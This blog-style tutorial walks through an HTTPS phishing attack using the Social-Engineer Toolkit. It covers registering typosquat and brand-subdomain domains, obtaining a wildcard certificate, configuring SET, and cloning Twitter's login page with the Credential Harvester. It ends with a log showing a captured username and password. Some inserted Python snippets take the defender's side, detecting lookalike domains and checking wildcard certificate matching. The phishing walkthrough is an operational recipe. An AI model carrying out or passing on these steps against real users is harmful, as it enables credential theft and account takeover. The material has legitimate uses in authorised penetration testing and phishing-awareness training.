The Social-Engineer Toolkit, commonly known as SET, was created by Dave Kennedy. It is a Python-based framework for a variety of tools centered around social engineering attacks.
A common SET technique is to use it to clone a website to socially engineer a user into installing malware or to grab their credentials. These client side attacks rely on enticing the target to click on a link.
These types of attacks can often build a better trust relationship with the target by adding in SSL and using https rather than straight http to perform the attack.
Setting this up with SET is not the most intuitive thing, but is actually quite easy to do.
1) Register a domain name for social engineering
The first step is to register a domain name for use with a social engineering attack. The first method is to pick one specific to each job. For instance if we were hired to target company.com we might pick pany.com so we could create the domain com.pany.com. We might also pick a “typo squat” copy like conpany.com or add on to the existing domain like company-llc.com.
The other method is to register a flexible domain name that can be used in multiple situations. For instance we will be using account-verify.com. This will allow us to create domains like facebook.account-verify.com or google.account-verify.com.
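The defender's view of the same naming tricks, as an added example that is not part of the original post: a small classifier that flags each of the patterns above (brand as a subdomain, typo-squat, suffix-padding, and the com.pany.com label split) over a constructed list of newly observed domains of the kind a certificate-transparency or passive-DNS feed would produce. The `classify`/`scan` helpers and the `OBSERVED` list are assumptions made for this example.

```python
from typing import Dict, Iterable, List, Optional, Tuple

def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; a distance of 1 catches typo-squats like conpany.com."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def classify(observed: str, brand: str) -> Optional[str]:
    """Return which lookalike trick `observed` uses against `brand` (the protected
    label, e.g. 'company' for company.com), or None if it is not a lookalike.
    Assumes a two-label registrable domain (no co.uk-style public suffixes);
    that is a simplification for this example."""
    labels = observed.lower().rstrip(".").split(".")
    reg_label = labels[-2] if len(labels) >= 2 else labels[0]
    if reg_label == brand:
        return None                       # company.com or a genuine host under it
    if any(brand in lab for lab in labels[:-2]):
        return "brand-in-subdomain"       # facebook.account-verify.com
    if brand in reg_label:
        return "affix"                    # company-llc.com
    if edit_distance(reg_label, brand) == 1:
        return "typosquat"                # conpany.com
    if brand in "".join(labels):
        return "label-split"              # com.pany.com reads 'company' across the dots
    return None

def scan(observed: Iterable[str], brands: List[str]) -> Dict[str, Tuple[str, str]]:
    """Map each suspicious domain to (brand, trick); benign names are omitted."""
    hits: Dict[str, Tuple[str, str]] = {}
    for dom in observed:
        for brand in brands:
            trick = classify(dom, brand)
            if trick:
                hits[dom] = (brand, trick)
                break
    return hits

# Constructed sample of newly seen names, as a CT-log or passive-DNS feed might deliver them.
OBSERVED = ["company.com", "mail.company.com", "com.pany.com", "conpany.com",
            "company-llc.com", "facebook.account-verify.com", "google.account-verify.com"]

if __name__ == "__main__":
    for dom, (brand, trick) in scan(OBSERVED, ["company", "facebook"]).items():
        print(f"{dom:30} imitates {brand} via {trick}")
```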
2) Pick a CA for your SSL certificate
After you register the domain name, you need to pick a Certificate Authority (CA) to sign your SSL certificate. The CA is the root of trust (insomuch as they can be trusted.) They sign your certificate to say it is valid. Of course they charge for this.
Common CAs include Comodo, Trustwave, Entrust, Thawte and lots of resellers that can cut you a good deal. SSL shopper does a pretty good job of tracking deals on certificate signing.
For our domain, account-verify.com, we will register for a wildcard certificate. A wildcard domain allows us to get one certificate for *.account-verify.com which will be valid for any host on account-verify.com.
With a wildcard certificate we can create valid links for domains like:
It’s more expensive than a straight domain registration but can be very useful. NOTE: a wildcard certificate covers only a single label to the left of the registered domain; it does not match deeper subdomains. In other words:
will work, but
will give a domain name mismatch.
If you are planning on a single use domain like company-llc.com it is much cheaper to register for a certificate for a single host like www.company-llc.com.
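An added example (not the post's own code) that shows the single-label wildcard rule as the name-matching logic a TLS client applies, using the domain names from this post; the `WILDCARD_SANS` list is an assumption about what such a certificate typically carries.

```python
from typing import Iterable, Optional

def name_matches(cert_name: str, hostname: str) -> bool:
    """Does a certificate name (CN or SAN) cover `hostname`?
    Plain names must match exactly. A wildcard must be the entire left-most
    label and stands in for exactly one label, so *.account-verify.com covers
    facebook.account-verify.com but not login.facebook.account-verify.com
    or the bare account-verify.com. Case is ignored, as in DNS."""
    cert_name = cert_name.lower().rstrip(".")
    hostname = hostname.lower().rstrip(".")
    if "*" not in cert_name:
        return cert_name == hostname
    cert_labels = cert_name.split(".")
    host_labels = hostname.split(".")
    # Reject over-broad names like *.com and partial wildcards like f*.example.com.
    # The three-label minimum is a simplification that ignores public suffixes.
    if cert_labels[0] != "*" or len(cert_labels) < 3 or any("*" in lab for lab in cert_labels[1:]):
        return False
    if len(host_labels) != len(cert_labels):
        return False                      # the wildcard never spans more than one label
    return host_labels[1:] == cert_labels[1:]

def covering_name(cert_names: Iterable[str], hostname: str) -> Optional[str]:
    """Return the first certificate name that covers `hostname`, or None.
    CAs usually add the bare domain as an extra SAN beside the wildcard,
    which is why a list of names is checked rather than a single CN."""
    for name in cert_names:
        if name_matches(name, hostname):
            return name
    return None

# Constructed SAN list (an assumption) for a wildcard certificate on the post's domain.
WILDCARD_SANS = ["*.account-verify.com", "account-verify.com"]

if __name__ == "__main__":
    for host in ["facebook.account-verify.com", "login.facebook.account-verify.com", "account-verify.com"]:
        print(f"{host:36} -> {covering_name(WILDCARD_SANS, host)}")
```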
3) Generate your SSL key pair
After we decide on a CA we will need to generate a public/private key pair using openssl. We will use our public key as a certificate signing request, or CSR.
We will need openssl to run the following command (all on one line):
$ openssl req -nodes -newkey rsa:2048 -keyout STAR_account-verify_com.key -out STAR_account-verify_com.csr
While running the command, openssl will ask for specific information:
Country Name (2 letter code) [AU]: US
State or Province Name (full name) [Some-State]: New York
Locality Name (eg, city) : NYC
Organization Name (eg, company) [Internet Widgits Pty Ltd]: FakeCo, Ltd
Organizational Unit Name (eg, section) :
Common Name (eg, YOUR name) : *.account-verify.com
Email Address :
The most important field is the “common name”, which is the domain name we are signing. Since we are registering a wildcard domain we will use the format *.account-verify.com; otherwise you should specify the exact domain, like www.company-llc.com.
The result of this command will be two files: your private key and your public key/signing request.
STAR_account-verify_com.key : private key
STAR_account-verify_com.csr : public key/CSR
4) Submit your CSR
After generating your private and public key pair you will apply for your signed SSL certificate. Some CAs will require extensive documentation to prove who you are and that you own the domain. Usually you only need to receive an email at the domain in question. So we need to make sure we can receive email at an address like firstname.lastname@example.org
We will need to upload our public key/CSR, STAR_account-verify_com.csr, to the CA for signing.
After the certificate is signed (and paid for) you will receive an email with the signed and signing certificates. This is typically two or three files. You will definitely receive the signed certificate for your domain as well as the CA certificate used to sign it.
Sometimes the CA will not sign the certificate directly, but use chained, intermediate certificates instead. The CA signs an intermediate certificate which is then used to sign your actual certificate.
Your CA will typically return something like this:
TrustedCARoot.crt : CA certificate
IntermediateCA.crt : Optional intermediate CA cert
STAR_account-verify_com.crt : Signed cert
CRT, CER, PEM, KEY, DER?
Depending on which CA you decide on you may get different file types back. The file extension you will usually get is one of the following: crt, cer, key, pem or der.
In reality the extension doesn’t matter. There are actually only two different encodings: PEM and DER. We are looking for PEM. PEM is plaintext (really Base64-encoded ASCII) and will start with “-----BEGIN …”. DER is a binary format.
You can use the following command to convert a DER certificate to PEM format:
$ openssl x509 -inform der -in certificate.der -out certificate.pem
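An added example, not part of the original post, that does the same normalisation in Python: it decides PEM versus DER from the file contents rather than the extension, and converts DER to the PEM form SET expects. The `SAMPLE_DER` bytes are a constructed stand-in for a real DER certificate.

```python
import base64
import re

PEM_RE = re.compile(rb"-----BEGIN ([A-Z ]+)-----\s*(.*?)\s*-----END \1-----", re.S)

def detect_encoding(data: bytes) -> str:
    """Decide PEM vs DER from content, ignoring the file extension.
    A DER certificate is an ASN.1 SEQUENCE, so its first byte is the tag 0x30;
    PEM is ASCII text that starts with a '-----BEGIN' armor line."""
    if data.lstrip().startswith(b"-----BEGIN "):
        return "PEM"
    if data[:1] == b"\x30":
        return "DER"
    raise ValueError("neither PEM armor nor a DER SEQUENCE")

def der_to_pem(der: bytes, label: str = "CERTIFICATE") -> bytes:
    """What `openssl x509 -inform der -out cert.pem` produces: Base64 of the DER
    bytes, wrapped at 64 columns, between BEGIN/END lines."""
    b64 = base64.b64encode(der).decode("ascii")
    body = "\n".join(b64[i:i + 64] for i in range(0, len(b64), 64))
    return f"-----BEGIN {label}-----\n{body}\n-----END {label}-----\n".encode("ascii")

def pem_to_der(pem: bytes) -> bytes:
    """Strip the armor and decode the Base64 body back to DER bytes."""
    m = PEM_RE.search(pem)
    if not m:
        raise ValueError("no PEM block found")
    return base64.b64decode(b"".join(m.group(2).split()))

def as_pem(data: bytes) -> bytes:
    """Normalise whatever the CA sent (.crt/.cer/.der/.pem) to PEM for SET."""
    return data if detect_encoding(data) == "PEM" else der_to_pem(data)

# Constructed stand-in for a DER certificate: a tiny ASN.1 SEQUENCE { INTEGER 5 }.
# A real certificate is also a SEQUENCE, just much longer.
SAMPLE_DER = b"\x30\x03\x02\x01\x05"

if __name__ == "__main__":
    print(as_pem(SAMPLE_DER).decode("ascii"))
```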
To be compatible with SET we will need to rename our certificates so that they have the .pem extension:
$ mv STAR_account-verify_com.key STAR_account-verify_com-key.pem
$ mv STAR_account-verify_com.crt STAR_account-verify_com.pem
Copy your private key, STAR_account-verify_com-key.pem, and signed certificate, STAR_account-verify_com.pem, to your SET server.
5) Configure SET
To configure SET to use SSL we need to edit the config file. You will find it here:
In the config file you need to modify the following lines:
PEM_CLIENT=/full/path/to/STAR_account-verify_com.pem # Your signed certificate
PEM_SERVER=/full/path/to/STAR_account-verify_com-key.pem # Your private key
6) Running SET
Now we can run SET.
From the main menu select:
1) Social-Engineering Attacks
2) Website Attack Vectors
And in our case we will run the userid/password stealing tool:
3) Credential Harvester Attack Method
We will use the “site cloning” option:
2) Site Cloner
And then follow the prompts. The first thing we need to provide is our domain for the POST action of the login form we will clone.
set:webattack> IP address for the POST back in Harvester/Tabnabbing: account-verify.com
Then we pick the login page we want to clone.
set:webattack> Enter the url to clone: https://twitter.com
And we let SET perform its web sucking magic.
[*] Cloning the website: https://twitter.com
[*] This could take a little bit...
It usually doesn’t take long and will announce when it’s ready.
The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 443
[*] Information will be displayed to you as it arrives below:
Now we just need to send out some hooks and see if we can’t hook some phish.
After we hook a, I mean, misguided user via phishing or smishing or however we get them to connect to our site:
c-10-2-3-4.hsd1.ga.comcast.net - - [27/Nov/2012 22:42:49] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
POSSIBLE USERNAME FIELD FOUND: session[username_or_email]= email@example.com
POSSIBLE PASSWORD FIELD FOUND: session[password]= TestingHTTPSonSET
POSSIBLE USERNAME FIELD FOUND: redirect_after_login=/
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
And there you go. Go use SET in all of its SSL splendor.